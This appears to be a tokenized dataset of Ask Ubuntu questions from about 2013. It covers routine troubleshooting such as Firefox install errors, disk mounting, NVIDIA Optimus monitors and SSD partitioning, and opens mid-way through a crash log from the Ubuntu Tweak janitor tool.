com.ubuntu-tweak.janitor.plugins ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/last-clip-location ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : for key : com.ubuntu-tweak.tweak.last-clip-location ( gsettings.py:21 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.janitor/auto-scan ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : true for key : com.ubuntu-tweak.janitor.auto-scan ( gsettings.py:21 ) [ widgets ] [ debug ] connect the setting notify to on_value_changed : com.ubuntu-tweak.janitor.auto-scan ( widgets.py:35 ) [ widgets ] [ debug ] set the swtich to : true ( widgets.py:97 ) [ gui.containers ] [ debug ] there are totally 2 columns ( containers.py:117 ) [ gui.containers ] [ debug ] found item : ( < label object at 0x9656eb4 ( gtklabel at 0x973c038 ) > , < switch object at 0x9656bbc ( ubuntutweak+gui+widgets+switch at 0x949c9b0 ) > ) ( containers.py:184 ) [ gui.containers ] [ debug ] attach widget : < label object at 0x9656eb4 ( gtklabel at 0x973c038 ) > to grid : 0,1,1,1 ( containers.py:233 ) [ gui.containers ] [ debug ] set the widget ( < switch with key : auto-scan > ) align start ( containers.py:220 ) [ gui.containers ] [ debug ] attach widget : < switch with key : auto-scan > to grid : 1,1,1,1 ( containers.py:233 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/recently-used ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : [ ] for key : com.ubuntu-tweak.tweak.recently-used ( gsettings.py:21 ) [ clippage ] [ debug ] on_recently_scrolled_window_size_allocate , max_height : 380 ( __init__.py:201 ) [ commonsetting ] [ debug ] loading schema value for : com.ubuntu-tweak.tweak/window-size ( common.py:107 ) [ gsetting ] [ debug ] got the schema_default : ( -1 , -1 ) for key : com.ubuntu-tweak.tweak.window-size ( gsettings.py:21 ) [ clippage ] [ debug ] on_recently_scrolled_window_size_allocate , max_height : 380 ( __init__.py:201 ) [ app ] [ info ] select_target_feature : janitor ( main.py:378 ) [ app ] [ debug ] on_overview_button_toggled and widget.active is : false ( main.py:575 ) [ app ] [ debug ] on_janitor_button_toggled and widget.active is : true ( main.py:575 ) [ app ] [ debug ] feature janitor is not in self.navigation_dict ( main.py:580 ) [ janitor ] [ info ] auto scan status : true ( __init__.py:395 ) [ moduleloader ] [ info ] loading system modules for janitor ... ( __init__.py:54 ) [ moduleloader ] [ debug ] try to load module : opera_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : thumbnailcache_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : autoremoval_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : empathy_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : gwibber_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : googleearth_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : softwarecenter_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : oldkernel_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : mozilla_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : packageconfigs_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : aptcache_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : chrome_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading user extensions for janitor ... ( __init__.py:64 ) [ oldkernelplugin ] [ debug ] the current_kernel_version is 3.2.0-40 ( oldkernel_plugin.py:25 ) [ janitor ] [ debug ] left_view_width is : 235 , max_janitor_view_width is : 233 ( __init__.py:410 ) [ janitor ] [ debug ] on_move_handle : 237 ( __init__.py:324 ) [ gsetting ] [ debug ] the the value for type : none and value : 237 ( gsettings.py:52 ) [ janitor ] [ debug ] do_scan_task for mozilla_plugin for status : true ( __init__.py ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : aptcache_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] try to load module : chrome_plugin ( __init__.py:159 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ debug ] is_supported_distro ( __init__.py:238 ) [ moduleloader ] [ info ] loading user extensions for janitor ... ( __init__.py:64 ) [ oldkernelplugin ] [ debug ] the current_kernel_version is 3.2.0-40 ( oldkernel_plugi n.py:25 ) [ janitor ] [ debug ] left_view_width is : 235 , max_janitor_view_width is : 233 ( __init __.py:410 ) [ janitor ] [ debug ] on_move_handle : 237 ( __init__.py:324 ) [ gsetting ] [ debug ] the the value for type : none and value : 237 ( gsettings.py:52 ) [ janitor ] [ debug ] do_scan_task for mozilla_plugin for status : true ( __init__.py:5 68 ) [ janitor ] [ info ] scan cruft for plugin : firefoxcacheplugin ( __init__.py:571 ) [ janitor ] [ debug ] scroll_to_cell : 0 ( __init__.py:434 ) [ janitor ] [ debug ] disconnect the cleaned signal , or it will clean many times : moz illa_plugin ( __init__.py:623 ) [ janitor ] [ debug ] total_count is : 1 ( __init__.py:634 ) [ janitor ] [ debug ] do_scan_task for thumbnailcache_plugin for status : true ( __init __.py:568 ) [ janitor ] [ info ] scan cruft for plugin : thumbnailcacheplugin ( __init__.py:571 ) [ janitor ] [ debug ] scroll_to_cell : 1 ( __init__.py:434 ) [ janitor ] [ debug ] disconnect the cleaned signal , or it will clean many times : thu mbnailcache_plugin ( __init__.py:623 ) [ janitor ] [ debug ] total_count is : 3 ( __init__.py:634 ) [ janitor ] [ debug ] do_scan_task for softwarecenter_plugin for status : true ( __init __.py:568 ) [ janitor ] [ info ] scan cruft for plugin : softwarecentercacheplugin ( __init__.py:57 1 ) [ janitor ] [ debug ] scroll_to_cell : 2 ( __init__.py:434 ) ** gtk : error : /build/buildd/gtk+3.0-3.4.2/./gtk/gtktreestore.c:597 : gtk_tree_store_ge t_path : assertion failed : ( g_node ( iter- > user_data ) - > parent ! = null ) aborted ( core dumped )
282671	how to get the connected wifi network ssid ?	i want to obtain the currently connected wifi networks ssid in a bash script . i am trying to write a backup script where the script will perform a backup to a nas server if it 's connected to my home wifi network . i have looked into the ip route command but it only returns some basic information -
282672	opening a non-utf8 encoded text file	i sometimes need to open text files that are encoded in euc-kr . man gedit gives : -- encoding set the character encoding to be used for opening the files listed on the command line . this can be used to open specific files with the desired encoding : gedit -- encoding euc-kr readme.txt however , each file to be opened requires a similar command to be typed . i can run iconv on the file ( s ) , but then i have to deal with different file versions . do i have better options for dealing with non-utf8 text files ?
282681	install os using a live ubuntu usb	this question has a deceivingly simple title but be warned , what i am trying to do is not easy . what i am trying to attempt to do is to install an os ( qnx ) which is basically a dumb unix onto a hard drive . now the reason i am trying to do this in an odd way is because we only have it on a cd . the computer i want to install it on has no cd-rom driver and only one sata port . it has many usb but a usb to cdrom does n't work with this os . so , what i want to do is use a ubuntu live usb , load it up on the computer with the hard drive . i want to somehow emulate the boot process so that i can install from a virtual iso onto this hard drive . any conceptions on how to do this ?
282686	where can i find what filesystem lvm2 uses/	after a default installation of xubuntu ( 12.10 ) on a ssd card , i now have the following set up : a sata disk : /dev/sda1 -- > extended /dev/sda5 -- > ext4 ( mount point : /media/mark/ a ssd disk : /dev/sdb1 -- > ext2 ( mount point : /boot ) /dev/sdb/2 -- > extendend /dev/sdb5 -- > lvm2 pv ( mount point : xubuntu ) i am currently trying to find out what file system that lvm2 pv uses , since i hope it has journalling . i keep all my data and virtual machines on the sata disk at the moment , just to make sure that i can re-install xubuntu if necessary . can anyone tell me what file system lvm2 pv in xubuntu is used/ can anyone tell me if it 's any good for ssd cards ? thank you for your time and effort .
282691	how to convert .msg file ( outlook email msg ) into .eml ?	i have just started using ubuntu & thunderbird . i have saved my outlook emails in my hard disk which are with .msg extension and now when i try to open them in thunderbird it does n't open because thunderbird used .eml extension . please advise how can i convert my old emails of outlook in to thunderbird format .
282693	why ca n't ubuntu recognize my mobile broadband usb dongle when i plug it into the usb 3.0 port ?	i have a mobile broadband usb dongle . when i plug it into the usb 2.0 port ubuntu recognizes it and connects quickly , but on a usb 3.0 port ubuntu does not recognize it at all ! this problem is not unique , and i have experienced it with many brands of dongles and laptops . ( but all on ubuntu 12.04 ) . please help .
282698	when is the expected stable release date of ubuntu phone and ubuntu tablet ?	is there an expected stable release date of ubuntu phone and ubuntu tablet ? if so , what are their dates ?
282699	rhythmbox play no sound after changing output device	problem : rhythmbox play no sound after changing output device . ubuntu 12.04 , i386 , rhythmbox 2.96 . how i get this : - i have connected to my laptop a bluetooth headset . - in sound preferences i changed output device from notebook speakers to connected headset . - turned on rhythmbox to listen to music . - gave my headset to my friend without turning off . - laptop turned off . - laptop turned on . - i tried to listen to music with rhythmbox . rhythmbox behavior is as usual , but applet-indicator on drop-down sound menu freeze when i click to play if to start rhythmbox from dash it works but no sound is playing . other players works fine . i tried purge rhythmbox , gstreamer* and install it again , but no luck . if to login in other user - rhythmbox works fine . i think it is something with pulseaudio , but i do n't know what to do ...
282706	unable to install firefox using ubuntu software center	when i try to install firefox through the ubuntu software center , it starts applying changes without downloading the packages first and then i get this message : package operation failed the installation or removal of the package failed details : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory selecting previously unselected package firefox . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 225197 files and directories currently installed . ) unpacking firefox ( from ... /firefox_20.0+build1-0ubuntu0.12.10.3_i386.deb ) ... selecting previously unselected package firefox-globalmenu . unpacking firefox-globalmenu ( from ... /firefox-globalmenu_20.0+build1-0ubuntu0.12.10.3_i386.deb ) ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up firefox ( 20.0+build1-0ubuntu0.12.10.3 ) ... update-alternatives : error : alternative path /usr/bin/firefox does n't exist dpkg : error processing firefox ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of firefox-globalmenu : firefox-globalmenu depends on firefox ( = 20.0+build1-0ubuntu0.12.10.3 ) ; however : package firefox is not configured yet . dpkg : error processing firefox-globalmenu ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : firefox firefox-globalmenu error in function : setting up firefox ( 20.0+build1-0ubuntu0.12.10.3 ) ... update-alternatives : error : alternative path /usr/bin/firefox does n't exist dpkg : error processing firefox ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of firefox-globalmenu : firefox-globalmenu depends on firefox ( = 20.0+build1-0ubuntu0.12.10.3 ) ; however : package firefox is not configured yet . dpkg : error processing firefox-globalmenu ( -- configure ) : dependency problems - leaving unconfigured note : i had tried to install firefox earlier , but it gave an error while downloading , so i downloaded firefox from its official website , and followed instructions i found on https : //help.ubuntu.com/community/firefoxnewversion/mozillabuilds that let me use firefox , but i then thought that using the one from usc would be better , as it would update itself . so i deleted the mozilla build and tried to install again from usc , after which i got the above error . i suspect that my attempt to use the mozilla build might be the cause of the error . ok , when i entered 'sudo apt-get install firefox ' in the terminal , i got this : sudo apt-get install firefox reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : freegish-data gir1.2-gconf-2.0 gir1.2-unique-3.0 libunique-3.0-0 ndiswrapper-common ndiswrapper-utils-1.9 python-compizconfig use 'apt-get autoremove ' to remove them . the following extra packages will be installed : firefox-globalmenu suggested packages : latex-xft-fonts firefox-gnome-support the following new packages will be installed : firefox firefox-globalmenu 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/24.6 mb of archives . after this operation , 51.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package firefox . ( reading database ... 225197 files and directories currently installed . ) unpacking firefox ( from ... /firefox_20.0+build1-0ubuntu0.12.10.3_i386.deb ) ... selecting previously unselected package firefox-globalmenu . unpacking firefox-globalmenu ( from ... /firefox-globalmenu_20.0+build1-0ubuntu0.12.10.3_i386.deb ) ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... setting up firefox ( 20.0+build1-0ubuntu0.12.10.3 ) ... update-alternatives : error : alternative path /usr/bin/firefox does n't exist dpkg : error processing firefox ( -- configure ) : subprocess installed post-installation script returned error exit status 2 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ' after which i got a crash report .
282707	ubuntu does n't mount my hard disk	i 've installed ubuntu 12.10 on a usb stick it kept running very well and i could access my hard disk and other removable media , until suddenly i ca n't access the hard disk and any other removable media and i get this message every time i click on the hard disk item from the file browser . : error mounting /dev/sda1 at /media/ubuntu/1c489d42489d1b98 : command-line `mount -t '' ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' '' /dev/sda1 '' `` /media/ubuntu/1c489d42489d1b98 '' ' exited with non-zero exit status 21 : mount : according to mtab , /dev/sda1 is already mounted on /media/ubuntu/1c489d42489d1b98
282711	ubuntu 12.10 and prolong ssd life	i will be installing ubuntu 12.10 on a ssd as a dual boot with windows 7 . i also have a hdd that will be used as a data drive . i was thinking of having : / on ssd /home on hdd swap on hdd is there any other folders that i could move to it own partition ? how much space would i need for the different partitions ? is there any other tips anyone can give for prolonging the life of the ssd ? thanks sam
282713	is there a package management system for shell scripts ?	is there a package system ( think npm , cpan , etc . ) for shell scripts ? specifically , on ubuntu ?
282715	how can i make ascii-banners from the command line ?	i 've seen people using the terminal command : banner . this creates big ascii-art-style text . when i try to run it , however , the terminal says it does n't exist . why ? how do i install it ? are there any alternatives ?
282720	is there an `` open this in another desktop '' option ?	i usually work with 2 documents open at the same time , plus the browser and the file manager . i 'm a bit frustrated by having to move them to an empty desktop . i start opening the browser . then i have to wait until it opens ( low-powered pc ) , change desktop , and open the file manager . open every document , unmaximize it , and send it to another desktop . then go to the document and re-maximize . maybe there 's an option to open every window automatically in an empty desktop , if there 's one , and i 'm missing this funcionality . it would save me a few clicks ! thanks in advance
282723	installation of owncloud-client in ubuntu	hey guys , i am new here and here is my question . i just installed owncloud5 using ubuntu linux command line in a terminal and my next job is to install owncloud-client . i actually did that but the problem is that i ca n't run the following command : sudo chown -r www-data : www-data owncloud-client an error display like this : chown : can not access `owncloud-client ' : no such file or directory i need a help , thanks !
282731	any command to check packets received and transmitted	is there any command line option to check how many packets my p.c is receiving and transmitting in real time ( something like top ) ?
282738	what does this `` ... | ps `cat` '' command do ?	on my internet research , i found the following command as solution to find the process name of a window : xprop _net_wm_pid | sed 's/_net_wm_pid ( cardinal ) = // ' | ps `cat` i just do not understand what happens here after the first | . let 's assume that xprop _net_wm_pid outputs 1000 as process id . what happens next ? why do we have a cat after ps ? i am a bit confused .
282745	leave application running as we switch users	how can i leave deluge bittorrent running as different family members log into and use our ubuntu 12.04 laptop ? this seems like it should be some sort of daemon , but of course it has a gui , which i 'd like users to have equal access to .
282748	will i lose the software i have on 13.04 if i install 12.10 ?	i have many software like the tuxpaint , tux type , text editor , devhelp , recordmydesktop etc on my ubuntu 13.04 . will i loose these software if i install ubuntu 12.10 ?
282749	what is present in a .deb file ?	i downloaded google-chrome for linux , it got downloaded as a .deb file in downloads folder . i changed the current directory to the downloads folder and ran `` google-chrome '' in terminal . it started google chrome , but the issue is that .deb file is not a script ( as i understand ) . then how did the terminal understand that the 'google-chrome ' command meant to start it ? commands like emacs ... etc are already built-in . what about this command which is new to bash ? how did it recognise it ?
282753	how can i avoid downloading packages every-time i install my ubuntu ?	every time i install ubuntu on a computer i have to download the applications/packages with total size of 1.5~2gb and it took lots of my network bandwidth & time ! ! how can i avoid downloading the same packages that i am downloading everytime i.e i just need to have an archive of packages which have been downloaded once and stored somewhere , and use/install them when i install a new ubuntu ? ( like i did in windows - the setup files ... )
282757	how do i install orac ?	orac is a 3d chemical modelling software designed for unix os and i have downloaded the tarball http : //www.chim.unifi.it/orac/orac.5_3_3.tags.rel_5.3.3.r1963.tar.gz and extracted it but now i have no idea what to do . the readme file included read : prerequisites : * gnu make * gcc 4.3 or higher * ( possibly ) other fortran 90 compilers prerequisites for building the parallel version : * mpi ( message passing interface ) libraries and implementation/environment : mpich2 [ http : //www.mcs.anl.gov/research/projects/mpich2/ ] -or- openmpi [ http : //www.open-mpi.org/ ] * also see readme_parallel in tests/*/ to build orac executable program : make show # to list all available compilation targets make < target > to build a fresh distribution , cleaning all files created by user : make distro i am running 32 bit 12.10 and i have gnu make installed and gcc .
282760	problem while installing netbeans 7.3 on ubuntu 12.10	i just downloaded the latest version of netbeans on my ubuntu and made sure to do the same with jdk as well . problem is , every time i try to install netbeans , this message comes out : '' sybreed @ sybreed-vgn-bz31xt : ~/downloads $ sh netbeans-7.3-linux.sh configuring the installer ... searching for jvm on the system ... extracting installation data ... running the installer wizard ... an error occured while initializing the netbeans ide installer ui . most probably the running jvm is not compatible with the current platform . see faq at http : //wiki.netbeans.org/faqunabletopreparebundledjdk for more information . /usr/lib/jvm/jdk1.7.0_17/jre/lib/i386/xawt/libmawt.so : libxtst.so.6 : can not open shared object file : no such file or directory exception : java.lang.unsatisfiedlinkerror : /usr/lib/jvm/jdk1.7.0_17/jre/lib/i386/xawt/libmawt.so : libxtst.so.6 : can not open shared object file : no such file or directory '' does anyone have a clue what that means ? p.s : if this question has already been answered , i apologize in advance .
282765	where is my desktop background ?	after upgrading my ubuntu laptop from ubuntu 12.10 to 13.04 i `` lost '' the background wallpaper . the background is completely black . it stays the same regardless of the wallpaper i select . it switches between these two : however i can see the wallpaper that is set when i lock the screen .
282766	how to use theming in qml for ubuntu phone	the ubuntu interface toolkit documentations documents theming for qml elements with a syntax that is quite similar to css . it sounds amazing to me , but i am unable to get started with it . i have tried a lot but i guess iâm missing answers to some fundamental questions : are there any rules regarding where to place the .qmltheme files and how to name them ? how is the reference done ? will the style rules i set in the .qmltheme file automatically append to the element that has the respective name set ? or do i have to somehow set a reference in the .qmltheme file to the file containing the qml-element , or the other way round , or both ? maybe i didnât understand an important part of the documenation . english is not a native language of mine and therefore this specific documentation is hard to get for me .
282769	how to have '~/.config/autostart ' contents back ?	i had to erased all the contents of the folder /home/rgr/.config/autostart in the recovery mode in order to start the computer because of a video card change . is there a way to have those contents back without having to reinstall all xubuntu ? now that i am able to login the windows manager looks not to be working right .
282770	someone please help me with ubuntu installation	i recently installed ubuntu and was just wondering , straight after the installation where it asks me to restart now and stuff , when i select restart now , can i take my usb that had the contents on it out ? or do i have to keep it in ? sorry if this is a bad question ?
282771	how can i create 3d molecule models like the link given in the body ?	i 've tried jmol but i would like the carbons to stand out as clearly as it does in this model and thus it would be great if i could use black for carbon , white for hydrogen , blue for nitrogen and red for oxygen . i am running 32 bit 12.10 .
282772	how to use ubuntu dash as online search engine ?	i want to know if online google search engine searches can be done from within ubuntu dash . this is like a mini search engine within the ubuntu launcher . if this is possible , how to do it ?
282776	powerline fonts are n't working	i have installed powerline and installed the ubuntu mono powerline fonts and selected the font as the font to use in the terminal . the special characters still are n't working after installing the fonts . this is a default ubuntu install using gnome terminal . i have also tried konsole with no luck . any other ideas on how to get this font working properly ?
282778	ubuntu installer not seeing free space on hard disk ( dual boot )	i 'm trying to install ubuntu ( 12.10 ) on a laptop on a 240 gb intel ssd drive already containing a windows 7 installation . i have the disk partitioned as follows : 1500 mb , ntfs , system partition , something that the laptop came with 198 gb , ntfs , windows installation partition these partitions are followed by 23 gb of free space . the ubuntu installer , however , is not seeing the free space . instead what i get in the installation type dialog , is the following : i 've already tried creating an unformatted primary partition in the free space ( using windows , obviously ) but doing that did n't change the situation in any way . should i alter the partitions in some way in order to make the free space accessible to the ubuntu installer or am i missing something else here ?
282780	ubuntu version for toshiba satellite model no . : c850-i0012	i need to know which latest ubuntu version does toshiba satellite model no . : c850-i0012 support.i am from india and also provide me the links to download its drivers if any .
282783	ca n't detect second monitor ( nvidia optimus )	i 'm using ubuntu 12.04 on a dell xps with nvidia optimus . i know that questions related to this have been asked several times , and i followed many tutorials and instructions but could n't make this work . i tried to install several different versions of nvidia proprietary drivers ( xswat , xorg edgers , download directly through the site etc . ) and none would work ( nvidia module never gets loaded , and i ca n't even open nvidia-settings ) . i read that nvidia drivers are incompatible with this hybrid architecture , so i do n't care if i 'll use the nvidia or intel card ( i 'm not using this laptop for gaming , no need for super graphics ) , i just want the second monitor to work . i also tried manually changing the xorg.conf file , based on a sample xorg.conf i 've found here but it did n't work , so i rolled back the changes ; i do n't know if the problem was that i just do n't know how to properly configure this file , or it would n't work regardless of the change made . removing xorg.conf also does n't work ( i.e . ubuntu works normally , but still no second monitor ) . here are the outputs of my environment , please let me know if you need anything else : $ lspci -v | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) $ xrandr screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1920x1080 60.0*+ 59.9 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) $ lshw -c display pci ( sysfs ) *-display unclaimed description : vga compatible controller product : gf108 [ geforce gt 540m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : latency=0 resources : memory : f0000000-f0ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:3000 ( size=128 ) memory : f1000000-f107ffff *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:53 memory : f1400000-f17fffff memory : e0000000-efffffff ioport:4000 ( size=64 ) /etc/x11/xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 310.44 ( buildmeister @ swio-display-x86-rhel47-07 ) wed mar 27 15:56:20 pdt 2013 section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` extmod '' load `` dri2 '' load `` record '' load `` dbe '' load `` glx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` inputdevice '' identifier `` touchpad '' driver `` synaptics '' option `` device '' `` /dev/input/mouse1 '' option `` protocol '' `` auto-dev '' option `` leftedge '' `` 1700 '' option `` rightedge '' `` 5300 '' option `` topedge '' `` 1700 '' option `` bottomedge '' `` 4200 '' option `` fingerlow '' `` 25 '' option `` fingerhigh '' `` 30 '' option `` maxtaptime '' `` 180 '' option `` maxtapmove '' `` 220 '' option `` vertscrolldelta '' `` 100 '' option `` minspeed '' `` 0.06 '' option `` maxspeed '' `` 0.12 '' option `` accelfactor '' `` 0.0010 '' option `` shmconfig '' `` on '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` accelmethod '' # < str > # option `` backlight '' # < str > # option `` dri '' # < str > # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` relaxedfencing '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` tearfree '' # [ < bool > ] # option `` percrtcpixmaps '' # [ < bool > ] # option `` fallbackdebug '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # [ < bool > ] # option `` buffercache '' # [ < bool > ] identifier `` card0 '' driver `` nvidia '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection parts of /var/log/xorg.0.log ( let me know if you need the full content ) [ 26.008 ] ( ii ) intel ( 0 ) : output hdmi1 has no monitor section [ 26.120 ] ( ii ) intel ( 0 ) : output hdmi1 disconnected [ 25.876 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 25.876 ] compiled for 4.0.2 , module version = 